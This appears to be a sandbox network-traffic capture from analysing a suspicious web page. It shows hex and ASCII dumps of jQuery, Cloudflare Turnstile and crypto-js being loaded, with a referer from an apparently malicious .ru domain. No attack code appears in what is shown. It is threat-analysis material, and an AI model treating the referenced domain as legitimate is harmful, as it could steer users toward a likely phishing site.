                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  4192.168.2.1649710104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC646OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:49 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 47521
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211ce2ce278c83-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                                                                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                                                                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                                                                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                                                                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  5192.168.2.1649711104.17.25.144436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:50 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                                                                                                  ETag: W/"61182885-40eb"
                                                                                                                                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 552081
                                                                                                                                                                                                  Expires: Sun, 04 Jan 2026 22:37:50 GMT
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9S3KFVQxflU9RUNnSxenAW%2Foawt0iseh%2BEwu93UL3mRYuZdT96BVenKguwSG6V2kff2R2hQ%2FupSUsk%2BhnZgDmEV8pKRDHo5Dhl5CkfaxQ3RzDTQHTYHIXXJJ74Gqd%2BDkBx3sRhx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211ce3e9471a34-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                  Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
